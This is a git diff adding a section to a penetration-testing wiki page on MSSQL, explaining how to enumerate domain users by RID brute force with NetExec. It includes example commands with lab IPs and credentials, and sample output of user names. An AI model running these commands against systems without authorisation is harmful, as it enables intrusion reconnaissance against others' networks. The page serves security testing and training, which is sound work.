diff --git a/src/network-services-pentesting/pentesting-mssql-microsoft-sql-server/README.md b/src/network-services-pentesting/pentesting-mssql-microsoft-sql-server/README.md index 3c01bf224dd..7ec479290fa 100644 --- a/src/network-services-pentesting/pentesting-mssql-microsoft-sql-server/README.md +++ b/src/network-services-pentesting/pentesting-mssql-microsoft-sql-server/README.md @@ -79,6 +79,42 @@ msf> use windows/manage/mssql_local_auth_bypass ### [**Brute force**](../../generic-hacking/brute-force.md#sql-server) +### **User Enumeration via RID Brute Force** + +You can enumerate domain users through MSSQL by brute-forcing RIDs (Relative Identifiers). This technique is useful when you have valid credentials but limited privileges: +```bash +# Using NetExec (nxc) - formerly CrackMapExec +nxc mssql --local-auth -u -p '' --rid-brute 5000 + +# Examples: +nxc mssql 10.129.234.50 --local-auth -u sqlguest -p 'zDPBpaF4FywlqIv11vii' --rid-brute 5000 +nxc mssql 10.10.10.59 -u sa -p 'P@ssw0rd' --rid-brute 10000 + +# Without --local-auth for domain accounts +nxc mssql 10.10.10.59 -u DOMAIN\\user -p 'password' --rid-brute 5000 +``` + +Expected output: + +``` +[snippet] +MSSQL 10.129.234.50 1433 DC 1104: REDELEGATE\Christine.Flanders +MSSQL 10.129.234.50 1433 DC 1105: REDELEGATE\Marie.Curie +MSSQL 10.129.234.50 1433 DC 1106: REDELEGATE\Helen.Frost +MSSQL 10.129.234.50 1433 DC 1107: REDELEGATE\Michael.Pontiac +MSSQL 10.129.234.50 1433 DC 1108: REDELEGATE\Mallory.Roberts +MSSQL 10.129.234.50 1433 DC 1109: REDELEGATE\James.Dinkleberg +[snippet] +``` + +**Parameters:** +- `--local-auth`: Use local authentication instead of domain +- `--rid-brute `: Brute force RIDs up to the specified number (default: 4000) +- `-u`: Username +- `-p`: Password + +This technique will enumerate users by querying the MSSQL server for account information associated with sequential RIDs. + ### Manual Enumeration #### Login